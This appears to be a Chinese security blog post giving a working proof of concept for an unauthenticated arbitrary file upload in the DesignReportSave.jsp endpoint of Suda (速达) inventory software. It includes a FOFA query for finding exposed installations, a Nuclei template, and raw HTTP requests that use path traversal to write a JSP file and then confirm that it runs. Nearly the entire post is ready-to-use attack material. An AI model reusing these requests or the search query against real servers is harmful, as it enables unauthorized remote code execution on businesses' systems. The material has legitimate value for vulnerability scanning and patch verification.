fofa: app="速达软件-公司产品"
nuclei:
id: suda-DesignReportSave-upload
info:
name: 速达软件DesignReportSave.jsp接口存在任意文件上传漏洞
author: fgz
severity: critical
description: 速达进销存管理系统是一套完整的企业业务管理系统,统有机的将企业进货管理、销售管理、仓储管理、财务管理融为一体,有着极好易用性和实用性,全面提升了企业的管理能力和工作效率。该软件DesignReportSave.jsp接口处存在任意文件上传漏洞,未授权攻击者可以利用该漏洞上传恶意文件进而远控服务器。
metadata:
fofa-query: app="速达软件-公司产品"
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}"
file_content: "{{to_lower(rand_text_alpha(8))}}"
requests:
- raw:
- |
POST /report/DesignReportSave.jsp?report=../{{file_name}}.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 49
<% out.print("{{file_content}}");%>
- |
GET /{{file_name}}.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_2, "{{file_content}}")'
bp poc
POST /report/DesignReportSave.jsp?report=../test.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: ip
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 28
<% out.print("6666");%>
GET /test.jsp HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
